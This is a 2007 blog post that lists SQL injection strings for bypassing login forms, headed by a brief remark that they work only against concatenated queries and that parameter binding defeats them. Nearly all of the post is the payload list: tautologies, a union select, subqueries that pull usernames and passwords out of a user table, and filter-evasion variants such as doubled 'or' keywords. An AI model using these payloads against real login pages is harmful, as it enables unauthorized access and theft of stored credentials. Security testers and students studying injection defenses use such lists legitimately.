Tuesday, November 13, 2007

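SQL injection login bypass strings

These strings only have an effect when the login query is built by concatenating the user and pass fields into the SQL text. When both fields are bound as query parameters, they are compared as literal values and the login fails. Filters that strip quotes or keywords are not a substitute for parameter binding.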



pass:' union select * from tbluser where '1'='1
--------------------------------------------
user&pass : '<>'1
--------------------------------------------
user&pass : a'or'a'='a
--------------------------------------------
user : '<>1 and fldusername<>'
pass : '
--------------------------------------------
user&pass: ' and 1=1or '1'='1
--------------------------------------------
user : '+(select top 1 fldusername from tbluser)+'
pass : '+(select top 1 fldpassword from tbluser)+'
-------------------------------------------
user&pass: ' not in ('1') and '1'='1
-------------------------------------------
user&pass : 1'<'2
-------------------------------------------
user&pass : ' is not null and '1'='1
------------------------------------------
user :' oror ''='
pass:' oror ''='
------------------------------------------
user/pass :' oorr ''='

' or ' ,a'or'a'='a ,' oror ''='
